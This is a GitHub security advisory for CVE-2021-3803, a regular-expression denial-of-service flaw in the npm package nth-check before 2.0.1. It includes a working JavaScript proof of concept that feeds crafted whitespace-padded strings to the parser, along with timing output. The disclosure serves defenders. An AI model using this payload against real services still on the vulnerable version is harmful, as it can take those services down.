Skip to content

Inefficient Regular Expression Complexity in nth-check

High severity GitHub Reviewed Published Sep 20, 2021 to the GitHub Advisory Database • Updated Nov 29, 2023

Package

npm nth-check (npm)

Affected versions

< 2.0.1

Patched versions

2.0.1

Description

There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.

The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.

Proof of Concept

// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '2n' + ' '.repeat(i*10000)+"!";
    try {
        nthCheck.parse(attack_str) 
    }
    catch(err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
    }
}

The Output

attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms

References

Published by the National Vulnerability Database Sep 17, 2021
Reviewed Sep 20, 2021
Published to the GitHub Advisory Database Sep 20, 2021
Last updated Nov 29, 2023

Severity

High
7.5
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

EPSS score

0.267%
(68th percentile)

Weaknesses

CVE ID

CVE-2021-3803

GHSA ID

GHSA-rp65-9cf3-cjxr

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.